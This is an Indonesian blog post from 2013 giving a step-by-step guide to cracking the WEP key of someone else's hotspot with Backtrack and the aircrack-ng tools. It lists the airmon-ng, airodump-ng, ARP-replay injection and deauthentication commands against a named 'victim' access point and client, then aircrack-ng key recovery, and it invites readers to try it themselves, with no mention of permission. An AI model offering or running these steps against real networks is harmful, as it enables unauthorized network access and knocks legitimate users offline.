Senin, 14 Januari 2013

CARA MENJEBOL PROTEKSI WEB


Ini adalah bagian kedua dari praktek Menjebol HotSpot. Jikalau pada artikel sebelumnya kita membahas bagaimana menembus batas proteksi MAC address, pada kali ini kita akan membahas bagaimana mendapatkan akses HotSpot yang menggunakan WEP (Wired Equivalent Privacy) Keys.
Alat yang kita butuhkan adalah :

1.Sebuah Laptop
2.Sebuah Wireless Adapter yang mendukung Mode Monitoring dan Injection.
3.Linux Live CD distro : Backtrack 2.0 ( banyak di mbah goggle )
   Mengapa kita membutuhkan Laptop ?
   Tentu saja karena akses HotSpot biasanya diberikan untuk pengguna
   yang Mobile. Dan dengan laptop kita memiliki fleksibilitas yang tinggi pula.

Lalu apa yang dimaksud dengan Wireless Adapter yang mendukung mode monitoring dan injection ? Perlu anda ketahui, tidak semua Wireless Adapter yang ada dipasaran, maupun yang sudah built in dalam laptop, mendukung mode monitoring dan injection yang diperlukan untuk WEP hacking ini.
Yang perlu anda perhatikan adalah Chip dari Wireless Adapter anda. Chip terbaik dalam melakukan wireless hacking adalah Atheros dan Ralink. Namun Atheros adalah pilihan utama. Tidak banyak wireless adapter yang memiliki chip atheros di Indonesia, anda dapat mencari beberapa merk dibawah ini :

1.3Com 3CRPAG175B
2.3Com 3CRXJK10075
3.DLINK DWL-G630 Rev C
4.Linksys WPC55AG
5.TrendNET TEW-441PC
6.TrendNET TEW-443PI
7.TP-LINK TL-WN610G


Jika anda telah memilikinya, maka anda dapat memulai Langkah pertama dalam Wireless Hacking ini  yaitu lakukan booting dengan CD Backtrack anda




Langkah kedua tentu saja, langsung buka console anda dan ketikkan command berikut(saya asumsikan wireless adapter anda berchipset atheros) :

airmon-ng stop ath0
airmon-ng start wifi0

Kedua command ini berguna untuk mengaktifkan mode monitoring dan injection pada wireless adapter anda. Kemudian lanjutkan dengan monitoring jaringan wireless dengan mengetikkan command berikut :
airodump-ng ath0



Akan tampil seluruh jaringan wireless yang terdeteksi seperti diatas. Tampak terlihat Access Point Rek-1 diproteksi dengan WEP Encryption. itulah korban kita. AP Rek-1 diset pada Channel 6 dan memiliki BSSID 00:19:5B:5C:62:92 . Sekarang saatnya melakukan penyerangan.Buka Console baru dan ketikkan :

airodump-ng –channel 6 –bssid 00:19:5B:5C:62:92 -w hasil ath0

Perintah diatas akan mengumpulkan paket data yang dibutuhan untuk proses Cracking.
Selanjutnya lakukan injeksi paket pada Client yang terkoneksi pada AP untuk mendapatkan paket ARP lebih cepat. Bukalah lagi Console baru tanpa menutup console yang sebelumnya dan ketik :

aireplay-ng –arpreplay -b 00:19:5B:5C:62:92 -h 00:19:D2:45:D0:EB ath0

Client yang diserang ini memiliki Mac address 00:19:D2:45:D0:EB (lihat pada screenshot diatas pada tabel station yang terletak dibawah) . Anda tidak menemukan Mac address 00:19:D2:45:D0:EB pada screenshot ? tentu saja karena saat dilakukan screenshot belum terdeteksi
Tidak sabar menunggu ? Untuk mempercepat lagi datangnya ARP , maka kita dapat melakukan serangan Deauthentication untuk memutuskan hubungan Client ke AP sehingga ARP yang biasanya didapat saat awal koneksi client dapat lebih cepat didapat. Bukalah console baru sekali lagi dan ketikkan :

aireplay-ng –deauth 5 -c 00:19:D2:45:D0:EB -a 00:19:5B:5C:62:92 ath0

Hasil dari ketiga perintah ini dapat anda lihat pada screenshot dibawah ini :




I Like this Screenshot

Sampai sejauh ini anda telah melakukan pengumpulan paket yang dibutuhkan untuk menjebol WEP Keys. Langkah terakhir yang harus anda lakukan adalah buka console baru lagi dan ketikkan perintah berikut :

aircrack-ng hasil*.cap

atau apabila anda memiliki aircrack versi terbaru anda dapat juga mengetikkan perintah seperti berikut :

aircrack-ptw hasil-01.cap

Dan tunggulah beberapa menit hingga anda mendapatkan key tersebut Maaf Screenshot yang satu ini lupa saya buat, tapi yang pasti saya berhasil melakukannya dalam waktu 30 Menit dengan perintah aircrack-ptw hasil-01.cap .

Tertarik melakukannya ?

Tidak ada komentar:

Posting Komentar